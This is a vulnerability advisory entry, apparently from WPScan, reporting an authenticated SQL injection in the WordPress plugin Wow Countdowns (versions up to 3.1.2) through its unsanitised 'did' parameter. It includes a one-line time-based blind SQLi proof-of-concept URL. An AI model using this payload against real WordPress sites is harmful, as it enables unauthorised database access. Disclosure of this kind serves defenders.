Lucene search

K
wpvulndbWpvulndbWPVDB-ID:30C70315-3C17-41F0-A12F-7E3F793E259C
HistoryMar 07, 2022 - 12:00 a.m.

Wow Countdowns <= 3.1.2 - Admin+ SQLi

2022-03-0700:00:00
wpscan.com
13
wow countdowns
admin+
sql injection
authenticated
sql statement
user input
poc
plugin vulnerability

EPSS

0.001

Percentile

37.7%

The plugin does not sanitize user input into the ‘did’ parameter and uses it in a SQL statement, leading to an authenticated SQL Injection.

PoC

https://example.com/wp-admin/admin.php?page=mwp-countdown&amp;info;=del&amp;did;=1+AND+(SELECT+5382+FROM+(SELECT(SLEEP(5)))PpNt)

EPSS

0.001

Percentile

37.7%

Related for WPVDB-ID:30C70315-3C17-41F0-A12F-7E3F793E259C